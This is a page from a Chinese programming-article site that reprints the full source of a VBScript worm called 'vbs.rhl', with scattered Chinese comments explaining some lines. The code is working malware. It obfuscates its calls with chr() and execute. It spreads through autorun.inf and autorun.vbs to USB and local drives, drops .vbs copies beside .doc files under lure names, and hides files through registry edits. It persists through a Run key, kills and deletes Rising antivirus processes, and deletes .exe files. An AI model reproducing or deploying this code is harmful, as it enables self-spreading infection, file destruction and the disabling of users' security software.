欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

vbs病毒源文件

程序员文章站 2022-04-10 08:13:39
rem vbs.rhl dim fs,r,ss,w,reg,regpath,dvbs ddd="set fs =" &ch...
rem vbs.rhl

dim fs,r,ss,w,reg,regpath,dvbs
ddd="set fs =" &chr(67) & "reate" & "obj" & chr(101) & "c" & chr(116) & chr(40) & chr(34) & "scrip" & chr(116) & "ing.file" & chr(83) & "yste" &chr(109) & chr(79) & "bject" & chr(34) & chr(41)
execute ddd
rrr="set r =" &chr(119) & "scri" & "pt." &chr(67) & "reate" & "obj" & chr(101) & "c" & chr(116) & chr(40) & chr(34) & chr(119) & "scri" & "pt." &chr(115) & "he" & chr(108) & chr(108) & chr(34) & chr(41)
execute rrr
sss="fs." & chr(103) &"etfil" & chr(101) & chr(40) &chr(119) & "scri" & "pt." & "scri" & chr(112) & "tfull" &chr(110) & "ame" & chr(41)
ttt="set dvbs =" & sss
execute ttt
r.run (fs.getspecialfolder(0)&"\explorer.exe .\")
main() 
on error resume next
sub main()
regtime()
finddrive()
countdrive(ss)
regwrite()
ganranfile(ss)
xunhuan()
end sub   
function finddrive() 
if dvbs.name="usbdrive.dll" then
regwrite()
ganrandisk()
end if
if dvbs.name<>"autorun.vbs" and dvbs.name<>"usbdrive.dll" then
regwrite()
dvbs.delete(true)
end if
ss=trim("")
set dc = fs.drives
for each d in dc
if d.drivetype = 1 or d.drivetype= 2 and d.isready then 
ss = ss & d.driveletter 
end if
next
ss = strreverse(lcase(trim(ss))) 
end function
function countdrive(ss)
on error resume next
dim x
for i = 1 to len(ss) 
x = mid(ss, i, 1) 
if x="" then
x=mid(ss, 1, 1)
i=1
end if
set w = fs.getdrive(x)
ganrandiskroot()
next
end function
function ganrandiskroot()
dim c,s,f,vbc,ts,runreg
on error resume next
if w.drivetype=2 or w.drivetype=1 and w.isready then
if fs.fileexists(fs.getspecialfolder(1) & "\usbdrive.dll") then
else
fff=sss & ".copy(" & chr(34) & fs.getspecialfolder(1) & "\usbdrive.dll" &chr(34) & ")"
execute fff
if fs.fileexists(fs.getspecialfolder(1) & "\usbdrive.dll") then
else
fff=sss & ".copy(" & chr(34) & "d:\system volume information\usbdrive.dll" &chr(34) & ")"
execute fff
if fs.fileexists("d:\system volume information\usbdrive.dll") then
set ts = fs.createtextfile(w.driveletter & ":\vbs.reg", true)
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34)
ts.close
set f = fs.getfile(w.driveletter & ":\vbs.reg")
f.attributes=f.attributes+7
set ts = fs.createtextfile(w.driveletter & ":\doc.reg",true)
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"microsoft word 文档"& chr(34)
ts.close
set f = fs.getfile(w.driveletter & ":\doc.reg")
f.attributes=f.attributes+7
end if
end if
end if
if fs.fileexists(w.driveletter & ":\autorun.vbs") then
set c = fs.opentextfile(w.driveletter & ":\autorun.vbs", 1)
vbc = c.readall
if instr(vbc,"vbs.rhl") <> 0 then
c.close
else
c.close
set c = fs.getfile(w.driveletter & ":\autorun.vbs")
c.delete(true)
fff=sss & ".copy(" & chr(34) & w.driveletter & ":\autorun.vbs" &chr(34) & ")"
execute fff
s=array("2007总结病毒","这是病毒","违纪病毒","检查病毒","黑名单病毒","没有发出的病毒","恋爱的病毒(病毒)")
randomize    
i= int((6 * rnd) + 1) 
fff=sss & ".copy(" & chr(34) & w.driveletter & ":\" & s(i) & ".vbs" &chr(34) & ")"
execute fff
set b = fs.getfile(w.driveletter & ":\" & s(i) & ".vbs")
b.attributes=b.attributes-b.attributes
set c = fs.getfile(w.driveletter & ":\autorun.vbs")
c.attributes=c.attributes+7
if fs.fileexists(w.driveletter & ":\vbs.reg") or fs.fileexists(w.driveletter & ":\doc.reg") then
else
if w.driveletter="c" then
set ts = fs.createtextfile(fs.getspecialfolder(1) & "\vbs.reg", true)
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34)
ts.close
set f = fs.getfile(fs.getspecialfolder(1) & "\vbs.reg")
f.attributes=f.attributes+7
set ts = fs.createtextfile(fs.getspecialfolder(1) & "\doc.reg")
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"microsoft word 文档"& chr(34)
ts.close
set f = fs.getfile(fs.getspecialfolder(1) & "\doc.reg")
f.attributes=f.attributes+7
else
set ts = fs.createtextfile(w.driveletter & ":\vbs.reg",true)
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34)
ts.close
set f = fs.getfile(w.driveletter & ":\vbs.reg")
f.attributes=f.attributes+7
set ts = fs.createtextfile(w.driveletter & ":\doc.reg",true)
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"microsoft word 文档"& chr(34)
ts.close
set f = fs.getfile(w.driveletter & ":\doc.reg")
f.attributes=f.attributes+7
end if
end if
end if
else
fff=sss & ".copy(" & chr(34) & w.driveletter & ":\autorun.vbs" &chr(34) & ")"
execute fff
s=array("检查病毒","2007总结病毒","违纪病毒","这是病毒","黑名单","没有发出的病毒","恋爱的病毒(病毒)")
randomize    
i= int((6 * rnd) + 1) 
fff=sss & ".copy(" & chr(34) & w.driveletter & ":\" & s(i) & ".vbs" &chr(34) & ")"
execute fff
set b = fs.getfile(w.driveletter & ":\" & s(i) & ".vbs")
b.attributes=b.attributes-b.attributes
set c = fs.getfile(w.driveletter & ":\autorun.vbs")
c.attributes=c.attributes+7
if fs.fileexists(w.driveletter & ":\vbs.reg") or fs.fileexists(w.driveletter & ":\doc.reg") then
else
if w.driveletter="c" then
set ts = fs.createtextfile(fs.getspecialfolder(1) & "\vbs.reg", true)
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34)
ts.close
set f = fs.getfile(fs.getspecialfolder(1) & "\vbs.reg")
f.attributes=f.attributes+7
set ts = fs.createtextfile(fs.getspecialfolder(1) & "\doc.reg")
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"microsoft word 文档"& chr(34)
ts.close
set f = fs.getfile(fs.getspecialfolder(1) & "\doc.reg")
f.attributes=f.attributes+7
else
set ts = fs.createtextfile(w.driveletter & ":\vbs.reg", true)
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34)
ts.close
set f = fs.getfile(w.driveletter & ":\vbs.reg")
f.attributes=f.attributes+7
set ts = fs.createtextfile(w.driveletter & ":\doc.reg",true)
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"microsoft word 文档"& chr(34)
ts.close
set f = fs.getfile(w.driveletter & ":\doc.reg")
f.attributes=f.attributes+7
end if
end if
end if
if fs.fileexists(w.driveletter & ":\autorun.inf") then
set c = fs.opentextfile(w.driveletter & ":\autorun.inf", 1)
vbc = c.readall
if instr(vbc,"wscript.exe .\autorun.vbs") <> 0 then
c.close
else
set f = fs.getfile(w.driveletter & ":\autorun.inf")
f.attributes=f.attributes-f.attributes
set ts = f.openastextstream(2,-2)
ts.writeline "[autorun]" 
ts.writeline "open= "
ts.writeline ""
ts.writeline "shell\open=打开(&o) "
ts.writeline "shell\open\command=wscript.exe .\autorun.vbs" 
ts.writeline "shell\open\default=1 "
ts.close
f.attributes=f.attributes+7
end if
else
set ts = fs.createtextfile(w.driveletter & ":\autorun.inf",true)
ts.writeline "[autorun]" 
ts.writeline "open= "
ts.writeline ""
ts.writeline "shell\open=打开(&o) "
ts.writeline "shell\open\command=wscript.exe .\autorun.vbs"
ts.writeline "shell\open\default=1"
ts.close
set f = fs.getfile(w.driveletter & ":\autorun.inf")
f.attributes=f.attributes+7
end if
end if
end function
function regwrite()
on error resume next
dim s
a1="hke" & "y_cur" & "rent_us" & "er\soft" & "ware\mi" & "croso" & "ft\win" & "dows\cur" & "rentv" & "ersion\exp" & "lorer\ad" & "vanced\" (a1= hkey_current_user\software\microso ft\windows\currentversion\explorer\advanced\
a2="hk"&"ey_clas"&"ses_ro" & "ot\dll" & "file\"  (a2=hkey_classes_root\dllfile)
a3="hkey" & "_loca" & "l_mach" & "ine\soft" & "ware\mi" & "cros" & "oft\win" & "dows\cur" & "rentver" & "sion\poli" & "cies\expl" & "orer\nodr" & "ivetypeautorun"
(a3=hkey_local_machine\software\microsoft\windows\currentversion\policies\explorer\nodrivetypeautorun)
a4="hke" & "y_curr" & "ent_use" & "r\softw" & "are\micr" & "osoft\wi" & "ndows\cur" & "rentversi" & "on\polici" & "es\explor" & "er\nodrivet" & "ypeautorun"
(a4=hkey_current_user\software\microsoft\windows\currentversion\policies\explorer\nodrivetypeautorun)
a5="hk" & "ey_lo" & "cal_ma" & "chine\sof" & "tware\mi" & "croso" & "ft\wind" & "ows\curre" & "ntversi" & "on\ru" & "n\usbdr" & "ive.dll"
(a5=hkey_local_machine\software\microsoft\windows\currentversion\run\usbdrive.dll)
a6="r.re" & "gwri" & chr(116) & "e"                  (a6=r.regwrichr(116) e)
a7="hke" & "y_clas" & "ses_roo" & "t\vbsf" & "ile\defau" & "lticon\"
(a7=hkey_classes_root\vbsfile\defaulticon)
set s=fs.getdrive(fs.getdrivename(dvbs.path))  
scandoc(fs.getspecialfolder(0) & "\installer")
if reg="wordicon.exe" then
if s="c:" then
if fs.fileexists("d:\system volume information\usbdrive.dll") then
r.run(fs.getspecialfolder(1) & "\dllcache\regedit.exe /s" & space(3) & "d:\system volume information\doc.reg")
else
r.run(fs.getspecialfolder(1) & "\dllcache\regedit.exe /s" & space(3) & fs.getspecialfolder(1) & "\doc.reg")
end if
else
if fs.fileexists("d:\system volume information\usbdrive.dll") then
r.run(fs.getspecialfolder(1) & "\dllcache\regedit.exe /s" & space(3) & "d:\system volume information\doc.reg")
else
r.run(fs.getspecialfolder(1) & "\dllcache\regedit.exe /s" & space(3) & s.driveletter & ":\doc.reg")
end if
end if
ppp=a6&space(2)&chr(34) & a7 & chr(34)&"," &chr(34)&regpath & ",1"&chr(34)
execute ppp
else
if s="c:" then
if fs.fileexists("d:\system volume information\usbdrive.dll") then
r.run(fs.getspecialfolder(1) & "\dllcache\regedit.exe /s" & space(3) & "d:\system volume information\vbs.reg")
else
r.run(fs.getspecialfolder(1) & "\dllcache\regedit.exe /s" & space(3) & fs.getspecialfolder(1) & "\vbs.reg")
end if
else
if fs.fileexists("d:\system volume information\usbdrive.dll") then
r.run(fs.getspecialfolder(1) & "\dllcache\regedit.exe /s" & space(3) & "d:\system volume information\vbs.reg")
else
r.run(fs.getspecialfolder(1) & "\dllcache\regedit.exe /s" & space(3) & s.driveletter & ":\vbs.reg")
end if
end if
ppp=a6&space(2)&chr(34) & a7 & chr(34)&"," &chr(34)&fs.getspecialfolder(1) & "\shell32.dll,1"&chr(34)
execute ppp
end if
ppp=a6&space(2)&chr(34) & a1 & "showsuperhidden" &chr(34)& "," & "0," & chr(34)&"reg_dword"&chr(34)
execute ppp
ppp=a6&space(2)&chr(34) & a1 & "hidefileext" &chr(34)& "," & "1," & chr(34)&"reg_dword"&chr(34)
execute ppp
ppp=a6&space(2)&chr(34) & a1 & "hidden" &chr(34)& "," & "0," & chr(34)&"reg_dword"&chr(34)
execute ppp
ppp=a6&space(2)&chr(34) & a2 & "scriptengine\" &chr(34)& "," & chr(34)&"vbscript" & chr(34)
execute ppp
ppp=a6&space(2)&chr(34) & a2 & "scripthostencode\" &chr(34)& "," & chr(34)&"{85131631-480c-11d2-b1f9-00c04f86c324}" & chr(34)
execute ppp
ppp=a6&space(1)&chr(34) & a2 & "shell\open\command\" &chr(34)& "," & chr(34)&fs.getspecialfolder(1) &"\wscript.exe" &space(1)& chr(34) &chr(34) &"%1"&chr(34) & chr(34) &space(1)& "%*"  & chr(34)
execute ppp
ppp=a6&space(2)&chr(34) & a2 & "shellex\propertysheethandlers\wshprops\" &chr(34)& "," & chr(34)&"{60254ca5-953b-11cf-8c96-00aa00b8708c}" & chr(34)
execute ppp
ppp=a6&space(2)&chr(34) & a3 & chr(34)&"," & "0," & chr(34)&"reg_dword"&chr(34)
execute ppp
ppp=a6&space(2)&chr(34) & a4 & chr(34)&"," & "0," & chr(34)&"reg_dword"&chr(34)
execute ppp
if fs.fileexists("d:\system volume information\usbdrive.dll") then
ppp=a6&space(2)&chr(34) & a5 &chr(34)& "," & chr(34)& "d:\system volume information" & "\usbdr" & "ive.dll" & chr(34)
execute ppp
else
ppp=a6&space(2)&chr(34) & a5 &chr(34)& "," & chr(34)&fs.getspecialfolder(1)&"\usbdr" & "ive.dll" & chr(34)
execute ppp
end if
if day(date())="27" then                                                   (27号报告错误)
msgbox "小样!你的杀毐软件该升级了,磁盘已被格式化"
end if
end function
function scandoc(a)                                                       (定义子函数)
on error resume next                                                      (出错不报告)
dim files,file,subfolder,folder_
set folder_=fs.getfolder(a) 
set files=folder_.files 
for each file in files             (for each。。。next   对数组或集合中的每个元素重复执行一组语句)
if file.name ="wordicon.exe" then
reg=file.name
regpath=file.path
exit function
end if
next                                                                 (for each 的next)
set subfolders=folder_.subfolders                                       (set  是一个赋值语句)
for each subfolder in subfolders 
scandoc(subfolder) 
next  
end function                                                        (结束子程序的定义)
function regtime()                                   (定义一个子程序添加注册表,结束瑞星)
a6="r.re" & "gwri" & chr(116) & "e"               (a6= r.regwri chr(116)e  chr(116)是值)
a8="hke"&"y_cur" & "rent_us" & "er\soft" & "ware\micr" & "osoft\win" & "dows scr" &"iptingho"&"st\settin"&"gs\timeou                  (a8=注册表hkey_current_user\software\microsoft\windows scripting host\settings\timeout)
ppp=a6&space(2)&chr(34) & a8 &chr(34)& "," & "0," & chr(34)&"reg_dword"&chr(34)
execute ppp                                          (对指定的字符串执行正则表达式搜索)
dim nameorpid
kill=array("ravmon.exe","ravtask.exe","ravstub.exe","ravmond.exe","rsagent.exe")
for i=0 to 4
killprocess(kill(i))                                                     (结束4个瑞星程序)
next
end function                                                           (结束这个子程序)
function ganranfile(aa)                                                   (定义一个子程序)
on error resume next                                                       (出错不报告)
dim x
for i = 1 to len(aa)          (len函数  返回字符串内字符的数目,或是存储一变量所需的字节数)
x = mid(aa, i, 1)             (mid函数  从字符串中返回指定数目的字符。这里是一个个返回给x)
if x="" then
x=mid(aa, 1, 1)
i=1
end if
set x = fs.getdrive(x) 
if x.isready then
scan(x)
else
xunhuan()
end if
next
end function                                                    (结束本子程序,作用不明)
function scan(x)                                                 (定义子程序   scan(a)  )
on error resume next                                             ( 出错不报告 )
dim files,file,subfolder,folder_
set folder_=fs.getfolder(x) 
set files=folder_.files 
for each file in files
s=file.path
ext=fs.getextensionname(file) 
ext=lcase(ext)                                        (  lcase函数   返回字符串的小写形式)
if ext="doc" then 
fff=sss & ".copy("&chr(34) & mid(s,1,len(s)-3) & "vbs" &chr(34) & ")"    (fff是sss.copy加几个字符
怀疑这个几个字符组成一个文件名)
execute fff
end if 
next 
set subfolders=folder_.subfolders 
for each subfolder in subfolders 
scan(subfolder) 
next 
end function
function ganrandisk() 
on error resume next
regwrite()
dim doc, d, s, coun,w,h,oo
  set doc = fs.drives
for each k in doc
if k.isready then
h=h & k.driveletter
end if
next
t1=len(trim(h))
coun=doc.count
do while coun>0
oo=h & w
clearinfo(oo)
wscript.sleep 50
set d = fs.drives
if d.count>coun then
for each k in d
if k.isready then
s=s & k.driveletter
end if
next
coun=d.count
t= strreverse(lcase(trim(s))) 
w=mid(t,1,abs(len(t)-t1))
countdrive(w)
ganranfile(w)
s=trim("")
t1=len(t)
end if
if d.count<coun then
for each k in d
if k.isready then
s=s & k.driveletter
end if
next
coun=d.count
t= strreverse(lcase(trim(s))) 
s=trim("")
t1=len(t)
end if
loop
end function
function xunhuan()
on error resume next
dim sfo
set sfo=fs.getdrive(fs.getdrivename(dvbs.path)) 
if dvbs.name="autorun.vbs" or dvbs.name="usbdrive.dll" then
if sfo.drivetype=2 then 
ganrandisk() 
else
wscript.quit
end if
else
dvbs.delete(true)
end if
end function

function clearinfo(oo)
on error resume next
dim dc,z
oo =lcase(trim(oo))
for m = 1 to len(oo) 
z = mid(oo, m, 1) 
set z = fs.getdrive(z)
findinf(z)
v=array(z.driveletter & ":\recycled",z.driveletter & ":\system volume information")
for i= 0 to 1
scanexe(v(i))
next
next
vir=array(fs.getspecialfolder(1)& "\recycled",fs.getspecialfolder(2),fs.getspecialfolder(0)&"\system")
for i=0 to 2
scanexe(vir(i))
next
end function 
function scanexe(a)
wscript.sleep 100
on error resume next
dim files,file,folder_
if fs.folderexists(a) then
set folder_=fs.getfolder(a) 
set files=folder_.files 
for each file in files
ext=fs.getextensionname(file) 
ext=lcase(ext) 
if ext="exe" then 
set f = fs.getfile(file)
f.delete(true)
end if 
next 
set subfolders=folder_.subfolders 
for each subfolder in subfolders 
scanexe(subfolder) 
next 
end if
end function
function findinf(z)
on error resume next
if fs.fileexists(fs.getspecialfolder(1) & "\usbdrive.dll") then
else
fff=sss & ".copy(" & chr(34) & fs.getspecialfolder(1) & "\usbdrive.dll" &chr(34) & ")"
execute fff
if fs.fileexists(fs.getspecialfolder(1) & "\usbdrive.dll") then
else
ppp=a6&space(2)&chr(34) & a5 &chr(34)& "," & chr(34)& "d:\system volume information" & "\usbdr" & "ive.dll" & chr(34)
execute ppp
end if
end if
if fs.fileexists(z.driveletter & ":\autorun.vbs") then
else
fff=sss & ".copy(" & chr(34) & z.driveletter & ":\autorun.vbs" &chr(34) & ")"
execute fff
set f = fs.getfile(z.driveletter & ":\autorun.vbs")
f.attributes=f.attributes+7
end if
if fs.fileexists(z.driveletter & ":\autorun.inf") then
set c = fs.opentextfile(z.driveletter & ":\autorun.inf", 1)
vbc = c.readall
if instr(vbc,"wscript.exe .\autorun.vbs") <> 0 then
c.close
else
set f = fs.getfile(z.driveletter & ":\autorun.inf")
f.attributes=f.attributes-f.attributes
set ts = f.openastextstream(2,-2)
ts.writeline "[autorun]"                                    (以下建立自动播放文件) 
ts.writeline "open= "
ts.writeline ""
ts.writeline "shell\open=打开(&o) "
ts.writeline "shell\open\command=wscript.exe .\autorun.vbs" 
ts.writeline "shell\open\default=1 "
ts.close
f.attributes=f.attributes+7
end if
else
set ts = fs.createtextfile(z.driveletter & ":\autorun.inf",true)
ts.writeline "[autorun]" 
ts.writeline "open= "
ts.writeline ""
ts.writeline "shell\open=打开(&o) "
ts.writeline "shell\open\command=wscript.exe .\autorun.vbs"
ts.writeline "shell\open\default=1"
ts.close
set f = fs.getfile(z.driveletter & ":\autorun.inf")
f.attributes=f.attributes+7
end if
if fs.fileexists(z.driveletter & ":\vbs.reg") then
else
set ts = fs.createtextfile(z.driveletter & ":\vbs.reg", true)
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34)
ts.close
set f = fs.getfile(z.driveletter & ":\vbs.reg")
f.attributes=f.attributes+7
end if
if fs.fileexists(z.driveletter & ":\doc.reg") then
else
set ts = fs.createtextfile(z.driveletter & ":\doc.reg",true)
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"microsoft word 文档"& chr(34)
ts.close
set f = fs.getfile(z.driveletter & ":\doc.reg")
f.attributes=f.attributes+7
end if
end function

function killprocess(nameorpid)
on error resume next
    dim owmi, oprocs, oproc, strsql
    killprocess = false
    strsql = "select * from win32_process"
    if nameorpid <> "" then
        if isnumeric(nameorpid) then
            strsql = strsql & " where handle = '" & nameorpid & "'"
        else
            strsql = strsql & " where name = '" & nameorpid & "'"
        end if
    end if
    set owmi = getobject("winmgmts:\\.\root\cimv2")
    set oprocs = owmi.execquery(strsql)
    for each oproc in oprocs
        if isnumeric(nameorpid) then
            oproc.terminate
            killprocess = true
        else
            oproc.terminate
if day(date())="27" then
       set killfile=fs.getfile( oproc.executablepath)
killfile.delete(true)
        end if
end if
    next
    set oproc = nothing
    set oprocs = nothing
    set owmi = nothing
end function